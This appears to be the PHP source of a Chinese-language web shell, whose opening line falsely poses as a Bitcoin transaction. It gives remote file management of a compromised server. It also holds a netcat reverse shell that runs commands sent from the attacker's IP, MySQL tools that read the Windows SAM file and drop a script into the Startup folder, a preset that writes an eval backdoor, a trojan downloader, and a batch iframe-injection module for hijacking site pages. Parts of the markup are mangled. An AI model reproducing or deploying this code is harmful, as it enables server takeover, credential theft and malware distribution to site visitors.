比特币交易4fc62ebc4f7b1b2311ec1fcba48efe16dda9e2f07c40fb3;//无需验证密码!
$shellname='hello~地球~猴子星球欢迎你 ';
define('myaddress',__FILE__);
error_reporting(E_ERROR | E_PARSE);
header("content-Type: text/ charset=gb2312");
@set_time_limit(0);
ob_start();
define('envlpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
if(@get_magic_quotes_gpc()){
foreach($_POST as $k =& $v) $_POST[$k] = stripslashes($v);
foreach($_GET as $k =& $v) $_GET[$k] = stripslashes($v);
/*---End Login---*/
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
$dir = do_show($_GET['pack']);
$zip = new eanver($dir);
$out = $zip-&
do_download($out,"eanver.tar.gz");
if(isset($_GET['unzip'])){
css_main();
start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
if($eanver == "phpinfo") die(phpinfo());
if($eanver == 'logout'){
setcookie('envlpass',null);
die('&meta http-equiv="refresh" content="0;URL=?"&');
$class = array(
"信息操作" =& array("upfiles" =& "上传文件","phpinfo" =& "基本信息","info_f" =& "系统信息","eval" =& "执行PHP脚本"),
"提权工具" =& array("sqlshell" =& "执行SQL执行","mysql_exec" =& "MYSQL操作","myexp" =& "MYSQL提权","servu" =& "Serv-U提权","nc" =& "NC反弹","downloader" =& "文件下载","port" =& "端口扫描"),
"批量操作" =& array("guama" =& "批量挂马清马","tihuan" =& "批量替换内容","scanfile" =& "批量搜索文件","scanphp" =& "批量查找木马"),
"脚本插件" =& array("getcode" =& "获取网页源码")
$msg = array("0" =& "保存成功","1" =& "保存失败","2" =& "上传成功","3" =& "上传失败","4" =& "修改成功","5" =& "修改失败","6" =& "删除成功","7" =& "删除失败");
css_main();
switch($eanver){
case "left":
css_left();
html_n("&dl&&dt&&a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\"&");
html_img("title");html_n(" 本地硬盘&/a&&/dt&&dd id=\"items1\" style=\"display:\"&&ul&");
$ROOT_DIR = File_Mode();
html_n("&li&&a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'&网站根目录&/a&&/li&");
html_n("&li&&a href='?eanver=main' target='main'&本程序目录&/a&&/li&");
for ($i=66;$i&=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$
html_n("&li&&a title='$drive' href='?eanver=main&path=$drive' target='main'&本地磁盘($drive)&/a&&/li&");}}
html_n("&/ul&&/dd&&/dl&");
foreach($class as $name =& $array){
html_n("&dl&&dt&&a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\"&");
html_img("title");html_n(" $name&/a&&/dt&&dd id=\"items$i\" style=\"display:\"&&ul&");
foreach($array as $url =& $value){
html_n("&li&&a href=\"?eanver=$url\" target='main'&$value&/a&&/li&");
html_n("&/ul&&/dd&&/dl&");
html_n("&dl&&dt&&a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\"&");
html_img("title");html_n(" 其它操作&/a&&/dt&&dd id=\"items$i\" style=\"display:\"&&ul&");
html_n("&li&&a title='做好事,不留名' href='#' target=\"main\"&做好事,不留名&/a&&/li&");
html_n("&li&&a title='安全退出' href='?eanver=logout' target=\"main\"&安全退出&/a&&/li&");
html_n("&/ul&&/dd&&/dl&");
html_n("&/div&");
case "main":
css_js("1");
$dir = @dir($path);
$REAL_DIR = File_Str(realpath($path));
if(!empty($_POST['actall'])){echo '&div class="actall"&'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'&/div&';}
$NUM_D = $NUM_F = 0;
if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
$ROOT_DIR = File_Mode();
html_n("&table width=\"100%\" border=0 bgcolor=\"#555555\"&&tr&&td&&form method='GET'&地址:&input type='hidden' name='eanver' value='main'&");
html_n("&input type='text' size='80' name='path' value='$path'& &input type='submit' value='转到'&&/form&");
html_n("&br&&form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'&");
html_n("&input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"& &input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\"&");
html_input("file","upfilet","","&&&&& ");
html_input("submit","uploadt","上传");
if(!empty($_POST['newfile'])){
if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
if (substr(PHP_VERSION,0,1)&=5){if(($_POST['charset']=='GB2312') or ($_POST['charset']=='GBK')){}else{$_POST['txt'] = iconv("gb2312//IGNORE",$_POST['charset'],$_POST['txt']);}}
echo do_write($_POST['newfile'],$bin,$_POST['txt']) ? '&br&'.$_POST['newfile'].' '.$msg[0] : '&br&'.$_POST['newfile'].' '.$msg[1];
@touch($_POST['newfile'],@strtotime($_POST['time']));
html_n('&/form&&/td&&/tr&&/table&&form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"&&table width="100%" border=0 bgcolor="#555555"&&tr height="25"&&td width="45%"&&b&');
html_a('?eanver=main&path='.uppath($path),'&b&上级目录&/b&');
html_n('&/b&&/td&&td align="center" width="10%"&&b&操作&/b&&/td&&td align="center" width="5%"&');
html_n('&b&文件属性&/b&&/td&&td align="center" width="10%"&&b&修改时间&/b&&/td&&td align="center" width="10%"&&b&文件大小&/b&&/td&&/tr&');
while($dirs = @$dir-&read()){
if($dirs == '.' or $dirs == '..')
$dirpath = str_path("$path/$dirs");
if(is_dir($dirpath)){
$perm = substr(base_convert(fileperms($dirpath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
$dirpath = urlencode($dirpath);
html_n('&tr height="25"&&td&&input type="checkbox" name="files[]" value="'.$dirs.'"&');
html_img("dir");
html_a('?eanver=main&path='.$dirpath,$dirs);
html_n('&/td&&td align="center"&');
html_n("&a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');\"&改名&/a&");
html_n("&a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');\"&删除&/a& ");
html_a('?pack='.$dirpath,'打包');
html_n('&/td&&td align="center"&');
html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
html_n('&/td&&td align="center"&'.$filetime.'&/td&&td align="right"&');
html_n('&/td&&/tr&');
@$dir-&rewind();
while($files = @$dir-&read()){
if($files == '.' or $files == '..')
$filepath = str_path("$path/$files");
if(!is_dir($filepath)){
$fsize = @filesize($filepath);
$fsize = File_Size($fsize);
= substr(base_convert(fileperms($filepath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
$todir=$ROOT_DIR.'/zipfile';
$filepath = urlencode($filepath);
$it=substr($filepath,-3);
html_n('&tr height="25"&&td&&input type="checkbox" name="files[]" value="'.$files.'"&');
html_img(css_showimg($files));
html_a($Fileurls,$files);
html_n('&/td&&td align="center"&');
if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
html_a('?unzip='.$filepath,'解压','title="解压'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');"');
html_a('?eanver=editr&p='.$filepath,'编辑','title="编辑'.$files.'"');
html_n("&a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');\"&改名&/a&");
html_n("&a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');\"&删除&/a& ");
html_n("&a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');\"&复制&/a&");
html_n('&/td&&td align="center"&');
html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
html_n('&/td&&td align="center"&'.$filetime.'&/td&&td align="right"&');
html_a('?down='.$filepath,$fsize,'title="下载'.$files.'"');
html_n('&/td&&/tr&');
@$dir-&close();
if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
print&&&END
&div class="actall"& &input type="hidden" id="actall" name="actall" value="undefined"&
&input type="hidden" id="inver" name="inver" value="undefined"&
&input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"&
&input type="button" value="复制" onclick="SubmitUrl('复制所选文件到路径: ','{$REAL_DIR}','a');"&
&input type="button" value="删除" onclick="Delok('所选文件','b');"&
&input type="button" value="属性" onclick="SubmitUrl('修改所选文件属性值为: ','0666','c');"&
&input type="button" value="时间" onclick="CheckDate('{$Filetime}','d');"&
&input type="button" value="打包" onclick="SubmitUrl('打包并下载所选文件下载名为: ','{$_SERVER['SERVER_NAME']}.tar.gz','e');"&
目录({$NUM_D}) / 文件({$NUM_F})&/div&
case "editr":
css_js("2");
if(!empty($_POST['uploadt'])){
echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'"&');
if(!empty($_GET['redir'])){
$name=$_GET['name'];
$newdir = str_path($p.'/'.$name);
@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'"&');
if(!empty($_GET['refile'])){
$name=$_GET['name'];
$jspath=urlencode($p.'/'.$name);
$pp = urlencode($p);
$p = str_path($p.'/'.$name);
$FILE_CODE = "";
$charset= 'GB2312';
$FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
if(@file_exists($p)) echo '发现目录下有"同名"文件&br&';
$jspath=urlencode($p);
$FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
$FILE_CODE=@file_get_contents($p);
if (substr(PHP_VERSION,0,1)&=5){
if(empty($_GET['charset'])){
if(TestUtf8($FILE_CODE)&1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}
if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
$FILE_CODE = htmlspecialchars($FILE_CODE);
print&&&END
&div class="actall"&查找内容: &input name="searchs" type="text" value="{$dim}" style="width:500"&
&input type="button" value="查找" onclick="search(searchs.value)"&&/div&
&form method='POST' id="editor"
action='?eanver=main&path={$pp}'&
&div class="actall"&
&input type="text" name="newfile"
id="newfile" value="{$p}" style="width:750"&指定编码:&input name="charset" id="charset" value="{$charset}" Type="text" style="width:80" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this."&
&input type="button" value="选择" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset." style="width:50"&
html_select(array("GB2312" =& "GB2312","UTF-8" =& "UTF-8","BIG5" =& "BIG5","EUC-KR" =& "EUC-KR","EUC-JP" =& "EUC-JP","SHIFT-JIS" =& "SHIFT-JIS","WINDOWS-874" =& "WINDOWS-874","ISO-8859-1" =& "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].\"");
print&&&END
&div class="actall"&&textarea name="txt" style="width:100%;height:380"&{$FILE_CODE}&/textarea&&/div&
&div class="actall"&文件修改时间 &input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150"& &input type="checkbox" name="bin" value="wb+" size="" checked&以二进制形式保存文件(建议使用)&/div&
&div class="actall"&&input type="button" value="保存" onclick="CheckDate();" style="width:80"& &input name='reset' type='reset' value='重置'&
&input type="button" value="返回" onclick="window.location='?eanver=main&path={$pp}';" style="width:80"&&/div&
case "rename":
html_n("&tr&&td&");
$newname = urldecode($pp).'/'.urlencode($_GET['newname']);
@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
case "deltree":
html_n("&tr&&td&");
do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
case "del":
html_n("&tr&&td&");
@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
case "copy":
html_n("&tr&&td&");
$newpath = explode('/',$_GET['newcopy']);
$pathr[0] = $newpath[0];
for($i=1;$i & count($newpath);$i++){
$pathr[] = urlencode($newpath[$i]);
$newcopy = implode('/',$pathr);
@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
case "perm":
html_n("&form method='POST'&&tr&&td&".$p.' 属性为: ');
if(is_dir($p)){
html_select(array("0777" =& "0777","0755" =& "0755","0555" =& "0555"),$_GET['chmod']);
html_select(array("0666" =& "0666","0644" =& "0644","0444" =& "0444"),$_GET['chmod']);
html_input("submit","save","修改");
if($_POST['class']){
switch($_POST['class']){
case "0777": $change = @chmod($p,0777);
case "0755": $change = @chmod($p,0755);
case "0555": $change = @chmod($p,0555);
case "0666": $change = @chmod($p,0666);
case "0644": $change = @chmod($p,0644);
case "0444": $change = @chmod($p,0444);
$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
html_n("&/td&&/tr&&/form&");
case "info_f":
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "&a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\"&".$_SERVER['SERVER_ADMIN']."&/a&" : "&a href=\"mailto:".get_cfg_var("sendmail_from")."\"&".get_cfg_var("sendmail_from")."&/a&";
if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","&br&",$dis_func);$dis_func = str_replace(",","&br&",$dis_func);}
$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
array("服务器时间",date("Y年m月d日 h:i:s",time())),
array("服务器域名","&a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\"&".$_SERVER['SERVER_NAME']."&/a&"),
array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
array("服务器操作系统",PHP_OS),
array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
array("你的IP",$_SERVER["REMOTE_ADDR"]),
array("Web服务端口",$_SERVER['SERVER_PORT']),
array("PHP运行方式",strtoupper(php_sapi_name())),
array("PHP版本",PHP_VERSION),
array("运行于安全模式",Info_Cfg("safemode")),
array("服务器管理员",$adminmail),
array("本文件路径",myaddress),
array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
array("允许使用curl_exec",Info_Fun("curl_exec")),
array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
array("显示错误信息 display_errors",Info_Cfg("display_errors")),
array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
array("允许最大上传文件 upload_max_filesize",$upsize),
array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
array("被禁用的函数 disable_functions",$dis_func),
array("phpinfo()",$phpinfo),
array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
array("图形处理 GD Library",Info_Fun("imageline")),
array("IMAP电子邮件系统",Info_Fun("imap_close")),
array("MySQL数据库",Info_Fun("mysql_close")),
array("SyBase数据库",Info_Fun("sybase_close")),
array("Oracle数据库",Info_Fun("ora_close")),
array("Oracle 8 数据库",Info_Fun("OCILogOff")),
array("PREL相容语法 PCRE",Info_Fun("preg_match")),
array("PDF文档支持",Info_Fun("pdf_close")),
array("Postgre SQL数据库",Info_Fun("pg_close")),
array("SNMP网络管理协议",Info_Fun("snmpget")),
array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
array("XML解析",Info_Fun("xml_set_object")),
array("FTP",Info_Fun("ftp_login")),
array("ODBC数据库连接",Info_Fun("odbc_close")),
array("Session支持",Info_Fun("session_start")),
array("Socket支持",Info_Fun("fsockopen")),
$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
echo '&table width="100%" border="0"&';
for($i = 0;$i & count($info);$i++){echo '&tr&&td width="40%"&'.$info[$i][0].'&/td&&td&'.$info[$i][1].'&/td&&/tr&'."\n";}
try{$registry_proxystring = $shell-&RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
$Telnet = $shell-&RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
$PcAnywhere = $shell-&RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
}catch(Exception $e){}
echo '&tr&&td width="40%"&Terminal Service端口为&/td&&td&'.$registry_proxystring.'&/td&&/tr&'."\n";
echo '&tr&&td width="40%"&Telnet端口为&/td&&td&'.$Telnet.'&/td&&/tr&'."\n";
echo '&tr&&td width="40%"&PcAnywhere端口为&/td&&td&'.$PcAnywhere.'&/td&&/tr&'."\n";
echo '&/table&';
case "nc":
$M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"];
$B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019';
print&&&END
&form method="POST"&
&div class="actall"&使用方法:&br&
先在自己电脑运行"nc -l -p 1019"&br&
然后在此填写你电脑的IP,点连接!&/div&
&div class="actall"&你的IP &input type="text" name="mip" value="{$M_ip}" style="width:100"& 端口号 &input type="text" name="bport" value="{$B_port}" style="width:50"&&/div&
&div class="actall"&&input type="submit" value="连接" style="width:80"&&/div&
if((!empty($_POST['mip'])) && (!empty($_POST['bport'])))
echo '&div class="actall"&';
$mip=$_POST['mip'];
$bport=$_POST['bport'];
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
fputs ($fp ,"\n*********************************************\n
hacking url:http://www.mumasec.tk/ is ok!
\n*********************************************\n\n");
while(!feof($fp)){
fputs ($fp," [r00t@H4c3ing:/root]# ");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--& ".$message."\n");
fclose ($fp);
echo '&/div&';
case "sqlshell":
$MSG_BOX = '';
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
if(isset($_POST['mhost']) && isset($_POST['muser']))
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
else $MSG_BOX = '连接MYSQL失败';
$downfile = 'c:/windows/repair/sam';
if(!empty($_POST['downfile']))
$downfile = File_Str($_POST['downfile']);
$binpath = bin2hex($downfile);
$query = 'select load_file(0x'.$binpath.')';
if($result = @mysql_query($query,$conn))
$k = 0; $downcode = '';
while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
$filedown = basename($downfile);
if(!$filedown) $filedown = 'envl.tmp';
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-'.$arrayend);
header('Content-Disposition: filename='.$filedown);
header('Content-Length: '.strlen($downcode));
else $MSG_BOX = '下载文件失败';
$o = isset($_GET['o']) ? $_GET['o'] : '';
print&&&END
&form method="POST" name="nform" id="nform"&
¢er&&div class="actall"&&a href="?eanver=sqlshell"&[MYSQL执行语句]&/a&
&a href="?eanver=sqlshell&o=u"&[MYSQL上传文件]&/a&
&a href="?eanver=sqlshell&o=d"&[MYSQL下载文件]&/a&&/div&
&div class="actall"&
地址 &input type="text" name="mhost" value="{$mhost}" style="width:110px"&
端口 &input type="text" name="mport" value="{$mport}" style="width:110px"&
用户 &input type="text" name="muser" value="{$muser}" style="width:110px"&
密码 &input type="text" name="mpass" value="{$mpass}" style="width:110px"&
库名 &input type="text" name="mdata" value="{$mdata}" style="width:110px"&
&div class="actall" style="height:220"&
if($o == 'u')
$uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs';
if(!empty($_POST['uppath']))
$uppath = $_POST['uppath'];
$query = 'Create TABLE a (cmd text NOT NULL);';
if(@mysql_query($query,$conn))
if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
if(@mysql_query($query,$conn))
$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败';
else $MSG_BOX = '插入临时表失败';
@mysql_query('Drop TABLE IF EXISTS',$conn);
else $MSG_BOX = '创建临时表失败';
print&&&END
&br&&br&上传路径 &input type="text" name="uppath" value="{$uppath}" style="width:500px"&
&br&&br&选择文件 &input type="file" name="upfile" style="width:500height:22"&
&/div&&div class="actall"&&input type="submit" value="上传" style="width:80"&
elseif($o == 'd')
print&&&END
&br&&br&&br&下载文件 &input type="text" name="downfile" value="{$downfile}" style="width:500px"&
&/div&&div class="actall"&&input type="submit" value="下载" style="width:80"&
if(!empty($_POST['msql']))
$msql = $_POST['msql'];
if($result = @mysql_query($msql,$conn))
$MSG_BOX = '执行SQL语句成功&br&';
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
else $MSG_BOX .= mysql_error();
print&&&END
&script language="javascript"&
function nFull(i){
Str = new Array(11);
Str[0] = "select version();";
Str[1] = "select load_file(0x633A5C5C735CDEC5C6D652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
Str[2] = "select '&?php eval(\$_POST[cmd]);?&' into outfile 'F:/web/bak.php';";
Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
nform.msql.value = Str[i];
&textarea name="msql" style="width:700height:200"&{$msql}&/textarea&&/div&
&div class="actall"&
&select onchange="return nFull(options[selectedIndex].value)"&
&option value="0" selected&显示版本&/option&
&option value="1"&导出文件&/option&
&option value="2"&写入文件&/option&
&option value="3"&开启外连&/option&
&input type="submit" value="执行" style="width:80"&
if($MSG_BOX != '') echo '&/div&&div class="actall"&'.$MSG_BOX.'&/div&&/center&&/form&';
else echo '&/div&&/center&&/form&';
case "downloader":
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
print&&&END
&form method="POST"&
&div class="actall"&超连接 &input name="durl" value="{$Com_durl}" type="text" style="width:600"&&/div&
&div class="actall"&下载到 &input name="dpath" value="{$Com_dpath}" type="text" style="width:600"&&/div&
&div class="actall"&&input value="下载" type="submit" style="width:80"&&/div&&/form&
if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
echo '&div class="actall"&';
$contents = @file_get_contents($_POST['durl']);
if(!$contents) echo '无法读取要下载的数据';
else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';
echo '&/div&';
case "issql":
session_start();
if($_POST['sqluser'] && $_POST['sqlpass']){
$_SESSION['sql_user'] = $_POST['sqluser'];
$_SESSION['sql_password'] = $_POST['sqlpass'];
if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
die(html_a('?eanver=sqlshell','连接失败请返回'));
die(html_a('?eanver=sqlshell','连接失败请返回'));
$query = mysql_query("SHOW DATABASES",$sqlcon);
html_n('&tr&&td&数据库列表:');
while($db = mysql_fetch_array($query)) {
html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
echo '&&';
html_n('&/td&&/tr&');
if($_GET['db']){
css_js("3");
mysql_select_db($_GET['db'], $sqlcon);
html_n('&tr&&td&&form method="POST" name="DbForm"&&textarea name="sql" COLS="80" ROWS="3"&'.$_POST['sql'].'&/textarea&&br&');
html_select(array(0=&"--SQL语法--",7=&"添加数据",8=&"删除数据",9=&"修改数据",10=&"建数据表",11=&"删数据表",12=&"添加字段",13=&"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'");
html_input("submit","doquery","执行");
html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
html_n('---&');
html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
html_n('&/form&&br&');
if(!empty($_POST['sql'])){
if (@mysql_query($_POST['sql'],$sqlcon)) {
echo "执行SQL语句成功";
echo "出错: ".mysql_error();
if($_GET['table']){
html_n('&table border=1&&tr&');
$query = "SHOW COLUMNS FROM ".$_GET['table'];
$result = mysql_query($query,$sqlcon);
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields,$row['Field']);
html_n('&td&&font color=#FFFF44&'.$row['Field'].'&/font&&/td&');
html_n('&/tr&&tr&');
$result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
while($text = @mysql_fetch_assoc($result)){
foreach($fields as $row){
if($text[$row] == "") $text[$row] = 'NULL';
html_n('&td&'.$text[$row].'&/td&');
echo '&/tr&';
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
html_n("&tr&&td&&a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'&".$row[0]."&/a&&/td&&/tr&");
case "upfiles":
html_n('&tr&&td&服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'&form method="POST" enctype="multipart/form-data"&');
html_input("text","uppath",root_dir,"&br&上传到路径: ","51");
print&&&END
&SCRIPT language="JavaScript"&
function addTank(){
k=tank.rows.
newRow=document.all.tank.insertRow(-1)
&!--删除选择--&
newcell=newRow.insertCell()
newcell.innerHTML="&input name='tankNo' type='checkbox'& &input type='file' name='upfile[]' value='' size='50'&"
function delTank() {
if(tank.rows.length==1)
var checkit =
for (var i=0;i&document.all.tankNo.i++) {
if (document.all.tankNo[i].checked) {
tank.deleteRow(i+1);
if (checkit) {
alert("请选择一个要删除的对象");
&table cellSpacing=0 cellPadding=0 width="100%" border=0&
&td width="7%"&&input class="button01" type="button"
onclick="addTank()" value=" 添 加 " name="button2"/&
&input name="button3"
type="button" class="button01" onClick="delTank()" value="删除" /&
id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" &
&tr&&td&请选择要上传的文件:&/td&&/tr&
&tr&&td&&input name='tankNo' type='checkbox'& &input type='file' name='upfile[]' value='' size='50'&&/td&&/tr&
html_n('&br&&input type="submit" name="upfiles" value="上传" style="width:80"& &input type="button" value="返回" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80"&');
if($_POST['upfiles']){
foreach ($_FILES["upfile"]["error"] as $key =& $error){
if ($error == UPLOAD_ERR_OK){
$tmp_name = $_FILES["upfile"]["tmp_name"][$key];
$name = $_FILES["upfile"]["name"][$key];
$uploadfile = str_path($_POST['uppath'].'/'.$name);
$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];
echo '&br&&br&'.$
html_n('&/form&');
case "guama":
$patht = isset($_POST['path']) ? $_POST['path'] : root_
$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
$codet = isset($_POST['code']) ? $_POST['code'] : "&iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"&&/iframe&";
